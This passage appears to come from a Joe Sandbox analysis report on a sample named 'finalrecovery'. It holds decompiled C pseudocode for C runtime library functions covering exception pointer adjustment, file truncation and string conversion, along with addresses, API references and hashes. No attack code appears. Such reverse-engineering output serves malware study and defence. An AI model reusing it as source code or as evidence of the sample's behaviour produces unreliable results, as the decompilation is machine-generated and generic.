										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00410440(_t107, E004100A1(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00410440(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x450568; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x42e234();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00419BC9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x43b918);
									E0040F960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00411E3B(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00412B3B(_t103, _t108[0x18], E004100A1( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00412B4B(_t103, _t108[0x18], E004100A1( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E004100A1();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00411e3b
0x00411e3d
0x00411e42
0x00411e47
0x00411e49
0x00411e4c
0x00411e51
0x00411f61
0x00411f61
0x00411f61
0x00000000
0x00411e60
0x00411e60
0x00411e65
0x00411e6f
0x00411e71
0x00411e76
0x00411e7b
0x00411e7b
0x00411e7d
0x00411e80
0x00411e85
0x00411ea7
0x00411ea7
0x00411eaa
0x00411ead
0x00411ecb
0x00411ece
0x00411f0d
0x00411f10
0x00411f13
0x00411f38
0x00411f3a
0x00000000
0x00411f3c
0x00411f3c
0x00411f3e
0x00000000
0x00411f40
0x00411f40
0x00411f45
0x00411f49
0x00411f49
0x00411f4a
0x00000000
0x00411f4a
0x00411f3e
0x00411f15
0x00411f15
0x00411f17
0x00000000
0x00411f19
0x00411f19
0x00411f1b
0x00000000
0x00411f1d
0x00411f2e
0x00000000
0x00411f33
0x00411f1b
0x00411f17
0x00411ed0
0x00411ed0
0x00411ed4
0x00000000
0x00411eda
0x00411eda
0x00411edc
0x00000000
0x00411ee2
0x00411ee9
0x00411ef1
0x00411ef5
0x00411ef7
0x00411efa
0x00411eff
0x00411f00
0x00000000
0x00411f00
0x00411efa
0x00000000
0x00411ef5
0x00411edc
0x00411ed4
0x00411eaf
0x00411eaf
0x00000000
0x00411eaf
0x00411e8c
0x00411e8c
0x00411e91
0x00411e96
0x00000000
0x00411e98
0x00411e9a
0x00411ea3
0x00411eb2
0x00411eb4
0x00411f73
0x00411f73
0x00411f78
0x00411f79
0x00411f7b
0x00411f80
0x00411f85
0x00411f88
0x00411f8b
0x00411f8e
0x00411f97
0x00411f97
0x00411f90
0x00411f90
0x00411f90
0x00411f9a
0x00411f9e
0x00411fa1
0x00411fa2
0x00411fa3
0x00411fa4
0x00411fa7
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fe9
0x00411fb5
0x00411fb5
0x00411fb5
0x00411fb8
0x00411fcf
0x00411fcf
0x00411fb8
0x00411fee
0x00411ff8
0x00412004
0x00411ec2
0x00411ec2
0x00411ec7
0x00411ec8
0x00411f02
0x00411f09
0x00411f4d
0x00411f4d
0x00411f54
0x00411f63
0x00411f66
0x00411f72
0x00411f72
0x00411eb4
0x00411e96
0x00000000
0x00000000
0x00000000
0x00411e65

APIs

___AdjustPointer.LIBCMT ref: 00411F02
___AdjustPointer.LIBCMT ref: 00411F25
___AdjustPointer.LIBCMT ref: 00411FC1

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e5305a5fedea42a63369c705c1c9af7a9fc9b5da4a42a91436d3069ab0757690
Instruction ID: 031db4d7465caab717f4487c23bf1eb54370f22a8ea329297a3165cc490b5ad6
Opcode Fuzzy Hash: e5305a5fedea42a63369c705c1c9af7a9fc9b5da4a42a91436d3069ab0757690
Instruction Fuzzy Hash: F951E372604302AFDB248F51D881BFA77A4EF54704F14012FEE05866A1D739ECC2C798

Uniqueness

Uniqueness Score: -1.00%

Function 10003E7A Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E10003E7A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x10015860);
				E10003100(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E10005070(_t107, E1000380B(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E10005070(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x10017cdc; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x10010164();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E100068B8(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x10015880);
									E10003100(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E10003E7A(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E10004B7A(_t103, _t108[0x18], E1000380B( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E10004B8A(_t103, _t108[0x18], E1000380B( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E1000380B();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x10003e7a
0x10003e7c
0x10003e81
0x10003e86
0x10003e88
0x10003e8b
0x10003e90
0x10003fa0
0x10003fa0
0x10003fa0
0x00000000
0x10003e9f
0x10003e9f
0x10003ea4
0x10003eae
0x10003eb0
0x10003eb5
0x10003eba
0x10003eba
0x10003ebc
0x10003ebf
0x10003ec4
0x10003ee6
0x10003ee6
0x10003ee9
0x10003eec
0x10003f0a
0x10003f0d
0x10003f4c
0x10003f4f
0x10003f52
0x10003f77
0x10003f79
0x00000000
0x10003f7b
0x10003f7b
0x10003f7d
0x00000000
0x10003f7f
0x10003f7f
0x10003f84
0x10003f88
0x10003f88
0x10003f89
0x00000000
0x10003f89
0x10003f7d
0x10003f54
0x10003f54
0x10003f56
0x00000000
0x10003f58
0x10003f58
0x10003f5a
0x00000000
0x10003f5c
0x10003f6d
0x00000000
0x10003f72
0x10003f5a
0x10003f56
0x10003f0f
0x10003f0f
0x10003f13
0x00000000
0x10003f19
0x10003f19
0x10003f1b
0x00000000
0x10003f21
0x10003f28
0x10003f30
0x10003f34
0x10003f36
0x10003f39
0x10003f3e
0x10003f3f
0x00000000
0x10003f3f
0x10003f39
0x00000000
0x10003f34
0x10003f1b
0x10003f13
0x10003eee
0x10003eee
0x00000000
0x10003eee
0x10003ecb
0x10003ecb
0x10003ed0
0x10003ed5
0x00000000
0x10003ed7
0x10003ed9
0x10003ee2
0x10003ef1
0x10003ef3
0x10003fb2
0x10003fb2
0x10003fb7
0x10003fb8
0x10003fba
0x10003fbf
0x10003fc4
0x10003fc7
0x10003fca
0x10003fcd
0x10003fd6
0x10003fd6
0x10003fcf
0x10003fcf
0x10003fcf
0x10003fd9
0x10003fdd
0x10003fe0
0x10003fe1
0x10003fe2
0x10003fe3
0x10003fe6
0x10003fef
0x10003fef
0x10003ff2
0x10004028
0x10003ff4
0x10003ff4
0x10003ff4
0x10003ff7
0x1000400e
0x1000400e
0x10003ff7
0x1000402d
0x10004037
0x10004043
0x10003f01
0x10003f01
0x10003f06
0x10003f07
0x10003f41
0x10003f48
0x10003f8c
0x10003f8c
0x10003f93
0x10003fa2
0x10003fa5
0x10003fb1
0x10003fb1
0x10003ef3
0x10003ed5
0x00000000
0x00000000
0x00000000
0x10003ea4

APIs

___AdjustPointer.LIBCMT ref: 10003F41
___AdjustPointer.LIBCMT ref: 10003F64
___AdjustPointer.LIBCMT ref: 10004000

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 86d281c51d542b8956626c8c1f1d28d78e6030c3b117972411c5b4f3c3d087d4
Instruction ID: 05b9cb6cee9ab233904d532ca47041400c9ea06941b3a55bc6af4c30b617f094
Opcode Fuzzy Hash: 86d281c51d542b8956626c8c1f1d28d78e6030c3b117972411c5b4f3c3d087d4
Instruction Fuzzy Hash: 6F519DB5A04206AFFB1ACF50D841BABB7B8EF44390F21C529E80557299DB31EC84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0042B2BE Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0042B2BE(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0042B271( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00413571(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E0041D0D8(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00425532(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E0041D0D8(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00413571(__eflags))) = 0xd;
						_t36 = E0041355E(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E0041E1DB(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E0041AE5A(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00420FA8(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E0041355E(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E00413571(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00413571(_t70)));
										E0041E238(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E0041AE5A(_t56, _t50, _v12);
							E0041E238(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00413571(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x0042b2be
0x0042b2c7
0x0042b2d6
0x0042b2e4
0x0042b40d
0x0042b412
0x00000000
0x0042b2f9
0x0042b2f9
0x0042b2fc
0x0042b2ff
0x0042b302
0x0042b304
0x0042b3c9
0x0042b3d2
0x0042b3d9
0x0042b3dc
0x0042b3df
0x00000000
0x00000000
0x0042b3ef
0x0042b3f1
0x0042b396
0x0042b396
0x0042b414
0x0042b41f
0x0042b42d
0x0042b42d
0x0042b3f8
0x0042b3fe
0x0042b40b
0x00000000
0x0042b40b
0x0042b30a
0x0042b320
0x0042b323
0x0042b324
0x0042b326
0x0042b341
0x0042b344
0x0042b347
0x0042b348
0x0042b348
0x0042b34a
0x0042b35d
0x0042b35d
0x0042b35f
0x0042b362
0x0042b367
0x0042b36a
0x0042b36d
0x0042b39f
0x0042b3a2
0x0042b3a9
0x0042b3a9
0x0042b3af
0x0042b3b5
0x0042b3b7
0x00000000
0x0042b3bc
0x0042b36f
0x0042b370
0x0042b372
0x0042b375
0x0042b377
0x0042b37a
0x0042b37c
0x0042b356
0x0042b356
0x00000000
0x0042b356
0x0042b37e
0x00000000
0x00000000
0x00000000
0x0042b37e
0x0042b34c
0x00000000
0x00000000
0x0042b34e
0x0042b354
0x00000000
0x00000000
0x00000000
0x0042b380
0x0042b380
0x0042b380
0x0042b388
0x0042b38e
0x0042b393
0x00000000
0x0042b393
0x0042b32d
0x00000000
0x0042b3bf
0x0042b3bf
0x0042b3c1
0x00000000
0x00000000
0x0042b3c3
0x00000000
0x00000000
0x0042b3c5
0x0042b3c7
0x00000000
0x00000000
0x00000000
0x0042b3c7
0x0042b30a

APIs

_free.LIBCMT ref: 0042B38E
_free.LIBCMT ref: 0042B3B7
SetEndOfFile.KERNEL32(00000000,0042858C,00000000,?,?,?,?,?,?,?,?,0042858C,?,00000000), ref: 0042B3E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,0042858C,?,00000000,?,?,?,?,?), ref: 0042B405

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: b50c6fa3786e69eea85b3d89749a230a7d599c88a895923d8e24a85dce5311b5
Instruction ID: 16f0a0c9d858e1ea4fd30985b49bfad7c1e1ace49b0db677cbea6ff333ee0434
Opcode Fuzzy Hash: b50c6fa3786e69eea85b3d89749a230a7d599c88a895923d8e24a85dce5311b5
Instruction Fuzzy Hash: D741E776B00610ABDB11ABAAEC42BDE3766EF44364F580117FC14E7292D73CC98147AD

Uniqueness

Uniqueness Score: -1.00%

Function 00423AEF Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423AEF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00420014(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00420014(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0041353B(GetLastError());
									_t19 =  *((intOrPtr*)(E00413571(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E004240B5(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0041353B(GetLastError());
						return  *((intOrPtr*)(E00413571(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E004240B5(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00419CF8(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00423af6
0x00423afb
0x00423b19
0x00423b1b
0x00423b1e
0x00423b4b
0x00423b53
0x00423b55
0x00423b6e
0x00423b71
0x00423b74
0x00423b82
0x00423b91
0x00423b99
0x00423b9b
0x00423bb4
0x00423bb7
0x00423bb7
0x00423b9d
0x00423ba4
0x00423baf
0x00423baf
0x00423bb9
0x00000000
0x00423bb9
0x00423b79
0x00423b7e
0x00423b80
0x00000000
0x00000000
0x00000000
0x00423b80
0x00423b5e
0x00000000
0x00423b69
0x00423b20
0x00423b23
0x00423b26
0x00423b39
0x00423b3c
0x00423b0f
0x00423b0f
0x00000000
0x00423b12
0x00423b2c
0x00423b31
0x00423b33
0x00423bbd
0x00423bbd
0x00000000
0x00423b33
0x00423afd
0x00423b02
0x00423b07
0x00423b09
0x00423b0c
0x00000000

APIs

Part of subcall function 00419CF8: _free.LIBCMT ref: 00419D06

Part of subcall function 00420014: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0042132E,?,00000000,00000000), ref: 004200C0

GetLastError.KERNEL32 ref: 00423B57
__dosmaperr.LIBCMT ref: 00423B5E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00423B9D
__dosmaperr.LIBCMT ref: 00423BA4

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
Instruction ID: e2bc626332a1cb8f9240c891561028756cb59cc7de27e48891b77ebec3d406ca
Opcode Fuzzy Hash: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
Instruction Fuzzy Hash: F82127717002257F9B205F66AC80E6BBBBEEF00369780415AFD1583252DB3CEF4187A9

Uniqueness

Uniqueness Score: -1.00%

Function 10007B5E Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007B5E(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E10008D54(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E10008D54(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E10005880(GetLastError());
									_t19 =  *((intOrPtr*)(E100058B6(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E1000819A(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E10005880(GetLastError());
						return  *((intOrPtr*)(E100058B6(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E1000819A(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E10008180(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x10007b65
0x10007b6a
0x10007b88
0x10007b8a
0x10007b8d
0x10007bba
0x10007bc2
0x10007bc4
0x10007bdd
0x10007be0
0x10007be3
0x10007bf1
0x10007c00
0x10007c08
0x10007c0a
0x10007c23
0x10007c26
0x10007c26
0x10007c0c
0x10007c13
0x10007c1e
0x10007c1e
0x10007c28
0x00000000
0x10007c28
0x10007be8
0x10007bed
0x10007bef
0x00000000
0x00000000
0x00000000
0x10007bef
0x10007bcd
0x00000000
0x10007bd8
0x10007b8f
0x10007b92
0x10007b95
0x10007ba8
0x10007bab
0x10007b7e
0x10007b7e
0x00000000
0x10007b81
0x10007b9b
0x10007ba0
0x10007ba2
0x10007c2c
0x10007c2c
0x00000000
0x10007ba2
0x10007b6c
0x10007b71
0x10007b76
0x10007b78
0x10007b7b
0x00000000

APIs

Part of subcall function 10008180: _free.LIBCMT ref: 1000818E

Part of subcall function 10008D54: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B0F3,?,00000000,00000000), ref: 10008E00

GetLastError.KERNEL32 ref: 10007BC6
__dosmaperr.LIBCMT ref: 10007BCD
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C0C
__dosmaperr.LIBCMT ref: 10007C13

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 33a6cf4e76252723e4be5441b4a122b3940e4cedc959422be87a12125cdfdf0f
Instruction ID: 919b8e976f9ecb90de3acbe17c91f888c2c82116355e9d56d2017f5bd9120747
Opcode Fuzzy Hash: 33a6cf4e76252723e4be5441b4a122b3940e4cedc959422be87a12125cdfdf0f
Instruction Fuzzy Hash: 0921AF71A0021AAFF710DF658C81D5BB7ADFF042E4B118A29F958A7255EB35EC4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAE3 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0041CAE3(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x43d1c8; // 0x6
				_t67 = _t2 - 0xffffffff;
